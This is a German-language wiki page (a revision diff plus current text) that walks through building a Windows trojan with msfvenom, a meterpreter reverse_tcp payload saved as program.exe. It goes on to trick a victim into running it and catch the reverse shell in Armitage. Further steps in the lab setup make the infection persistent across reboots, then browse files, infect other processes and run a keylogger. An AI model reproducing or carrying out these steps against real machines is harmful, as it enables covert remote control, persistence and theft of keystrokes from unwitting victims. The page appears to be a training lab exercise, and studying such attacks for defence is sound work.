Metasploit & armitage trojaner: Unterschied zwischen den Versionen
David (Diskussion | Beiträge) |
David (Diskussion | Beiträge) |
||
Zeile 10: | Zeile 10: | ||
=Trojaner erstellen= | =Trojaner erstellen= | ||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe | msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe | ||
+ | |||
[[Datei:7 trojaner.png]] | [[Datei:7 trojaner.png]] | ||
=dem opfer das programm unterschieben= | =dem opfer das programm unterschieben= | ||
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an | das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an | ||
+ | |||
[[Datei:8 opfer.png]] | [[Datei:8 opfer.png]] | ||
+ | |||
auf der opfer seite | auf der opfer seite | ||
+ | |||
[[Datei:12 schadeware.png]] | [[Datei:12 schadeware.png]] | ||
=kontrolle übernehmen= | =kontrolle übernehmen= | ||
+ | |||
nun starten wier erst meta sploit und danach arimtage | nun starten wier erst meta sploit und danach arimtage | ||
+ | |||
[[Datei:1 armitage starten]] | [[Datei:1 armitage starten]] | ||
+ | |||
wenn armitage gestarte ist erstellne wier einen server zum luaschen | wenn armitage gestarte ist erstellne wier einen server zum luaschen | ||
*payload | *payload | ||
**windows | **windows | ||
***metapreter | ***metapreter | ||
+ | |||
hier passen wir den LPORT an | hier passen wir den LPORT an | ||
Zeile 34: | Zeile 42: | ||
wir suchen nach persists und geben einen neuen port an | wir suchen nach persists und geben einen neuen port an | ||
+ | |||
[[Datei:200persist.png]] | [[Datei:200persist.png]] | ||
+ | |||
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden | wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden | ||
Version vom 23. August 2016, 13:56 Uhr
setup Hacker
Kali linux ip: 192.168.242.91
setup Opfer
Windows 7 domaine rechner Benutzer: Admin ip: 192.168.242.76
Trojaner erstellen
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe
dem opfer das programm unterschieben
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an
auf der opfer seite
kontrolle übernehmen
nun starten wier erst meta sploit und danach arimtage
wenn armitage gestarte ist erstellne wier einen server zum luaschen
- payload
- windows
- metapreter
- windows
hier passen wir den LPORT an
und warten darauf das sich unser opfer verbindet
nun erscheint oben rechts der opfer computer
Dauerhaft infizieren
als nächstes wollen wier den trojaner dauerhaft speichern
wir suchen nach persists und geben einen neuen port an
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden
diese kann ein par minuten dauern
Was kann man machen
jetzt gibt es viele möglichkeiten
- rechtsklick infizierter pc
- meterpreter
- explore
- meterpreter
hier können wir uns Prozesse oder dateien anzeigen lassen andere Prozesse infizieren oder einen keyloger installieren usw
kurz Beispiel key loger
auf dem rechten seite schauen wier live in die datei in der wir mitschneiden
auf der linken seite ist der infizierte windows rechner